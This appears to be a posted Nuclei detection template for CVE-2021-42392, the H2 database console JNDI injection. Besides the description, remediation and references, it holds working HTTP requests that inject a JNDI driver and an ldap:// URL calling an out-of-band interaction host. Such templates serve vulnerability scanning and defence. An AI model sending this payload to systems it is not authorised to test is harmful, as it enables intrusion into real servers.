CVE-2021-42392: H2 Database Console - JNDI Injection RCE

2026-09-21 Unknown PoC Public

Description

The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution via the H2 web console (versions before 2.0.206 / 1.4.198 with the console enabled).

PoC

id: CVE-2021-42392

info:
  name: H2 Database Console - JNDI Injection RCE
  author: i-am-paradox
  severity: critical
  description: |
    The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution via the H2 web console (versions before 2.0.206 / 1.4.198 with the console enabled).
  impact: |
    An unauthenticated attacker can trigger an outbound JNDI lookup to a server they control, leading to remote code execution on the host running the H2 web console.
  remediation: |
    Upgrade H2 database to version 2.0.206 or later, and disable the web console (spring.h2.console.enabled=false) or restrict access to it.
  reference:
    - https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
    - https://github.com/advisories/GHSA-h376-j262-vhq6
    - https://github.com/h2database/h2database/commit/b24aa46f48904ce64443f8f4353d70a2eed09037
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42392
    - https://github.com/vulhub/vulhub/tree/master/h2database/CVE-2021-42392
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42392
    epss-score: 0.83176
    epss-percentile: 0.9967
    cwe-id: CWE-502
    cpe: cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: h2database
    product: h2
  tags: cve,cve2021,h2database,jndi,rce,oast,java,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /test.do?jsessionid={{jsessionid}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        driver=javax.naming.InitialContext&url=ldap://{{randstr}}.{{interactsh-url}}&user=&password=

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: regex
        name: jsessionid
        group: 1
        regex:
          - 'jsessionid=([0-9a-zA-Z-]+)'
        internal: true
# digest: 490a0046304402204c91f9b816468f873888d3c14d0ef27246f5f837a72fe66e78f3fed162e1aca9022067fe5d2179de274e8389fd14dc0b9948633b1a31484d7ff3c65f19f3af2d88dd:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.